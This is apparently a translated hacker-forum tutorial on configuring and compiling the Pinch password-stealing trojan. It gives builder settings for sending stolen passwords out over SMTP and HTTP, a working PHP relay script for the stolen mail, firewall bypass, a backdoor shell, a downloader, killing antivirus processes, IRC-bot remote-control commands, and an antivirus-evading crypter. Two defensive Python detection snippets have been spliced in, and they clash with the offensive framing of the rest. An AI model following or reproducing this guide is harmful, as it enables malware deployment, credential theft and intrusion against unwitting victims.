
Breaking e-mail, using BrutusAET2


MATERIAL IS PROVIDED FOR INFORMATIONAL PURPOSES. THE AUTHOR BEARS NO RESPONSIBILITY


------------------------------------------------------------------
Part 1. Old, but useful. For Pinch 1

************************
Pinch Instruction 1.0
************************

=====
Intro
=====

Please do not be surprised that I decided to write an article like this (an article for lamerzzz). The fact is that on my forum (http://forum.web-hack.ru) about three times a day a topic is created like "How to configure and use Pinch correctly?", "How to use Pinch?" etc.

========
Features
========

This trojan was quite widespread in 2003/2004, thanks to its ability to steal a large number of passwords (ICQ99b-2003a/Lite/ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, &RQ, The Bat!, The Bat! 2, Outlook/Outlook Express, IE autocomplete & protected sites & ftp (9x/ME/2000/XP), FAR Manager (ftp), Win/Total Commander (ftp), RAS (9x/Me/2k/xp supported)), its small size, open source and the ease of building a troj for a specific task. The trojan has the following features:

- Sends the victim's computer configuration: OS, CPU, HDD, logged-in user, host name, IP
- Keyboard spy (key-log)
- Remote console
- Firewall bypass
- Sending all passwords to e-mail via an SMTP server
- Encryption of the stolen-password mails
- Self-deletion of the trojan after launch
- HTML/text reports
- File size approximately 10 KB
- Modular system
- And much more...

The trojan was written by coban2k (http://www.cobans.net), a fairly well-known person in the world of ICQ hacking. Because of problems with his hoster over storing the trojan on their server, the author was forced to remove this creation from his site. Unfortunately, almost all antiviruses already detect this trojan, so it can only be slipped to a victim who has no antivirus.

============
Kit contents
============

The following folders and files are included in the archive (pinch_1.0.zip) with the trojan:

\PinchBuilder.exe - wizard for building the trojan
\Parser.exe - a program for decrypting the encoded e-mails with passwords
\readme.txt - no comment
\Pinch\ - the main folder with the trojan's asm source code and the compiler
\Sources\ - other sources
\TB!2 Plugin (Auto-parser)\ - the folder with the plugin for The Bat! 2, which decodes the encrypted password messages arriving in your mailbox
\Sources\Script\ - the PHP script through which passwords are sent when the corresponding option is chosen during compilation (read on)

====================
Compiling the trojan
====================

The kit comes with a special wizard (PinchBuilder.exe), which creates a trojan according to your requirements and compiles it right on your computer. The program has two main tabs: Compile and Decrypt. The first serves to create the trojan, the second to decrypt passwords (in fact, this tab duplicates Parser.exe). Then come three sub-tabs: SMTP, HTTP and FILE. They set how the passwords are delivered. Let's go through each in more detail:

========
SMTP
========

In the Server field, enter the address (hostname/IP) of the SMTP server. If you entered the server's domain name, click Resolve so that it is converted to an IP address. Next, in the From and To fields, enter your e-mail. The Send test message button is used to test sending mail through the settings you specified. I strongly recommend using it. If the letter does not arrive, there is some problem with sending (the firewall is on, a bad SMTP server, you did not click Resolve, etc.).

I want to note that recently most providers are switching to a scheme where their customers can send mail ONLY through the provider's own SMTP server. In such cases I recommend the method of sending mail via HTTP.

====
HTTP
====

Upload the file \Sources\Script\view.php to a server that supports PHP scripts and allows the mail() function. Next, in the URL field, specify the path to this script (for example, http://www.xss.ru/pinch.php). In the Subject field, specify the subject with which the letters will be sent. The Status check str field should contain the line that the script outputs after it is loaded. In the script that comes with the trojan, this value is _ret_ok_1:

<script language="JavaScript">
window.status = "_ret_ok_1";
</script>

If the trojan does not receive this value, it will try to send the e-mail through this script every minute until it gets the line from the Status check str field in response. I recommend that you use not the script from the standard package but the one written by me:

<html><body>
<?php
// Author: Terabyte (http://www.web-hack.ru)
$email = $_POST['a'];
$subject = $_POST['b'];
$msg = $_POST['c'];
if (isset($email) and isset($subject) and isset($msg)) {
mail($email, $subject, $msg, "From: $email");}
?>
<script language="JavaScript">
window.status = "_ret_ok_1";
</script>
</body></html>

It does almost the same thing but is written more correctly. A huge plus of this method of sending passwords is that it lets them pass the firewall. How is this achieved? Here is an excerpt from the Outpost log at the moment a password was sent through the script on my site:

Process Name: iexplorer.exe
Protocol: HTTP
Remote address: www.web-hack.ru

I think everyone who isn't asleep got the point =) Other pluses I can point out: the ability to store the encrypted letters on your site instead of sending them to e-mail; the ability to change the e-mail address the passwords are sent to, in case it gets deleted; and, during mass distribution of trojans, passwords can be sent even from providers that block access to every SMTP server except their own.
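The Outpost log entry above (a browser-like process name making HTTP requests) is also the defender's handle on this exfiltration channel. The Python below is an added example, not part of the original article: it scores constructed proxy records against three indicators taken from this page (a process name that is a lookalike of the real iexplore.exe, the a/b/c form read by the relay script, and the _ret_ok_1 status marker). The record layout, the LEGIT_BROWSERS allowlist and all sample values are assumptions.

```python
"""Flag Pinch-style HTTP password exfiltration in proxy/firewall records.

Heuristics taken from the page: the trojan shows up as iexplorer.exe (the
real Internet Explorer binary is iexplore.exe), POSTs fields a/b/c (address,
subject, body) to a PHP relay, and keeps retrying every minute until the
response carries the status marker "_ret_ok_1". Record format is constructed.
"""
import re
from difflib import SequenceMatcher

LEGIT_BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}  # assumed allowlist
STATUS_MARKER = "_ret_ok_1"
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$", re.I)

def lookalike_process(name: str) -> bool:
    """True if name is not a known browser but differs from one only slightly."""
    name = name.lower()
    if name in LEGIT_BROWSERS:
        return False
    return any(SequenceMatcher(None, name, b).ratio() >= 0.9 for b in LEGIT_BROWSERS)

def score_record(rec: dict) -> list:
    """Return the indicators matched by one proxy record."""
    hits = []
    if lookalike_process(rec["process"]):
        hits.append("browser-lookalike process name")
    form = rec.get("form", {})
    if set(form) == {"a", "b", "c"} and EMAIL_RE.match(form.get("a", "")):
        hits.append("a/b/c relay form with an e-mail address in field a")
    if rec["method"] == "POST" and STATUS_MARKER in rec.get("response", ""):
        hits.append("relay status marker in response")
    return hits

def suspicious(records):
    """Records matching at least two indicators, as (process, url, hits)."""
    return [(r["process"], r["url"], score_record(r))
            for r in records if len(score_record(r)) >= 2]

# Constructed sample records (not real traffic); hosts are placeholders.
SAMPLES = [
    {"process": "iexplorer.exe", "method": "POST",
     "url": "http://relay.example.invalid/pinch.php",
     "form": {"a": "drop@example.invalid", "b": "report", "c": "..."},
     "response": '<script>window.status = "_ret_ok_1";</script>'},
    {"process": "iexplore.exe", "method": "GET",
     "url": "http://www.example.invalid/", "form": {}, "response": "<html>ok</html>"},
]
if __name__ == "__main__":
    for proc, url, hits in suspicious(SAMPLES):
        print(proc, url, hits)
```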

====
FILE
====

On this tab, the path to the file where all passwords are saved is set. To do this, in the Path field, write the path to the file (for example, C:\password.txt).

=================
Compiler options
=================

Everything is clear in this area; here you just need to tick the boxes you need. It is worth paying attention to the Add Icon field. It specifies the path to the icon with which the compiled trojan will be displayed. I want to note that on my system (Windows XP) I never managed to compile the trojan with this option enabled and had to disable it.

In the Protocol field, specify the method by which passwords will be sent (SMTP/HTTP/FILE). Next, click the Compile button and compilation of the trojan should start; the result will be saved in the main folder with the wizard that created it.

====================
Password decryption
====================

Let's say you managed to slip this trojan to a lamer and received the passwords from the victim's machine. The thing is, the passwords are encrypted when sent, and they must first be decrypted (if you do not have the special plug-in for The Bat! described above). Copy the text with the encoded passwords to the clipboard, open Parser.exe (or the Decrypt tab in PinchBuilder.exe) and click the Process Data item in the context menu (or just press the key combination Alt+C). Next, the program will show you all the data stolen from the victim in a convenient form. Then you can save or print it.

===========
Conclusion
===========

I want to warn you that by using this trojan you immediately fall under Article 273 of the Criminal Code of the Russian Federation and can be seriously punished ;-) I (the author of the article) bear no responsibility for any harm that may be caused to any person after reading my article.


----------------------------------------

Part 2. Pinch instruction 2.58

A short article on elementary Pinch configuration. Don't judge strictly, but criticize as much as you like. An article on customizing Pinch 2.58.

I think there is no problem with the crack, as detailed help and even a video are attached. I want to show how to set up the trojan in the Builder:

SMTP Properties
Server (enter yours, in your case smtp.mail.ru), then you must click Resolve to convert it to an IP (by the way, all of these steps must be done with the Internet connected)

Port - leave as it is

Protocol - the choice of how the report will be delivered: via SMTP, HTTP (via PHP) or FILE (stored on the computer). The buttons of the same name (SMTP, HTTP, FILE) hold the settings of each protocol, but in this case we are interested in SMTP, and we have already configured it.

The TestSend button sends a test message to the mail.

PWD tab - passwords from the listed programs. If the ENABLE PWD item is unchecked, reports will not contain passwords.
Checkbox Don't send old report - do not send old reports.
The Encrypt and Packing checkboxes are interconnected. FSG, UPX, MEW - choice of packer.

RUN tab - selection of startup methods. I think you will figure it out. Build as... standard, DLL, Undelate Service. Move to a folder... either you specify one or select one of the system folders. To the right is the Values column; I didn't touch it and honestly have only a vague idea what it is for. Bottom right - bypass Windows Firewall (SP2) - bypasses the system firewall in SP2 (as far as I know, the mechanism of this item is that it starts as iexplorer.exe)

SPY tab - some additional reports - it didn't work for me. The Screen spy feature takes a screenshot, but again it didn't work for me (a screenshot was sent, but it was empty)

NET tab - I did not use it. It is designed to:
1. Open any port on the infected computer and accordingly get access to it (I strongly advise against using it if you do not encrypt it; if you get caught, you can guess yourself what will happen...)
2. Downloader - specify a direct link to any file that should be downloaded and launched (estimate what expenses your enemy will incur if his traffic is metered......))))
3. AutoUpdate - auto-update - the trojan, upon completing its work, downloads its own copy and then self-deletes; the next time the system boots, the new copy is launched (this is for reliability, so that it would not be found)

BD tab (backdoor) - the console: opens a shell on the selected port, controlled via telnet (telnet.exe) or alternative programs. (I have not tried it myself)

ECT tab - binding with some file, as well as setting the icon... You can also make a message pop up... But something doesn't work...

KILL tab - killing any process (you can also try to kill the antivirus), for example "spidernt" - then the DrWEB monitor will turn off (I warn you, I haven't done it yet, but I will try)

IE tab - setting your start page in the browser. Adding a page to Favorites....

WORM tab - what this is, I don't know...

IRC-bot tab - access to the computer through IRC:
.login - authorization
.die - bot shutdown
.download - download a file from a URL
.httpd - open access to a file via HTTP on a specific port
.killthread - terminate a specific task
.proxy - open a SOCKS4 proxy on the selected port with the selected id
.raw - send raw text to this IRC server
.remove - self-removal
.restart - restart
.run - run commands
.scan - scan IP addresses for specific open ports
.shell - open a shell on a specific port (not in 95/98/ME)
.status - show version, IP, launch date
.threads - show active tasks
.update - bot self-update from a special URL
.visit - visit the selected URL hidden
.url - visit the selected URL openly
.link - add to favorites
.sp - set as start page
.msg - message (messagebox)
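For detection, the command vocabulary above is a usable signature on its own. The Python below is an added example, not from the article or from Pinch: it parses constructed IRC PRIVMSG lines, attributes any leading bot command to its sender, and alerts on high-risk commands or on a sender issuing several distinct ones. The HIGH_RISK set, the thresholds and the sample lines are assumptions.

```python
"""Spot Pinch IRC-bot command traffic in captured IRC lines.
Command vocabulary is the list on this page; the PRIVMSG parser, thresholds
and sample lines are constructed for the example."""
import re
from collections import defaultdict

BOT_COMMANDS = {
    ".login", ".die", ".download", ".httpd", ".killthread", ".proxy", ".raw",
    ".remove", ".restart", ".run", ".scan", ".shell", ".status", ".threads",
    ".update", ".visit", ".url", ".link", ".sp", ".msg",
}
# Assumed: commands that alone warrant an alert (code execution, proxying, scanning).
HIGH_RISK = {".download", ".proxy", ".run", ".scan", ".shell", ".update"}
PRIVMSG_RE = re.compile(r"^:(?P<nick>[^!\s]+)\S*\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

def parse_privmsg(line: str):
    """Return (nick, target, text) for an IRC PRIVMSG line, else None."""
    m = PRIVMSG_RE.match(line.strip())
    return (m["nick"], m["target"], m["text"]) if m else None

def find_bot_commands(lines):
    """Map each sender nick to the bot commands it issued, in order."""
    seen = defaultdict(list)
    for line in lines:
        parsed = parse_privmsg(line)
        if not parsed:
            continue
        nick, _, text = parsed
        words = text.split()
        if words and words[0].lower() in BOT_COMMANDS:  # command must lead the message
            seen[nick].append(words[0].lower())
    return dict(seen)

def alerts(lines):
    """Nicks to alert on: any high-risk command, or three or more distinct commands."""
    return sorted(nick for nick, cmds in find_bot_commands(lines).items()
                  if HIGH_RISK & set(cmds) or len(set(cmds)) >= 3)

# Constructed capture (not real traffic); nicks and hosts are placeholders.
SAMPLE_LINES = [
    ":op!u@host.invalid PRIVMSG #ch :.login secret",
    ":op!u@host.invalid PRIVMSG #ch :.status",
    ":op!u@host.invalid PRIVMSG #ch :.proxy 1080 1",
    ":friend!u@host.invalid PRIVMSG #ch :hey, .status of the build?",
    ":friend!u@host.invalid PRIVMSG #ch :.status",
    "PING :irc.example.invalid",
]
```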

That's about it... You press COMPILE and the trojan appears in your build folder...

GOOD LUCK !!!!!

PS All this is written for informational purposes, and the author bears no responsibility for the consequences...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt features:
Polymorphic cryptor used
Bypasses KIS and Outpost (including the latest versions)
Self-removal
Size reduction (a normal Pinch shrinks by 3-6 KB, the zupacha loader by 60-80 KB)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~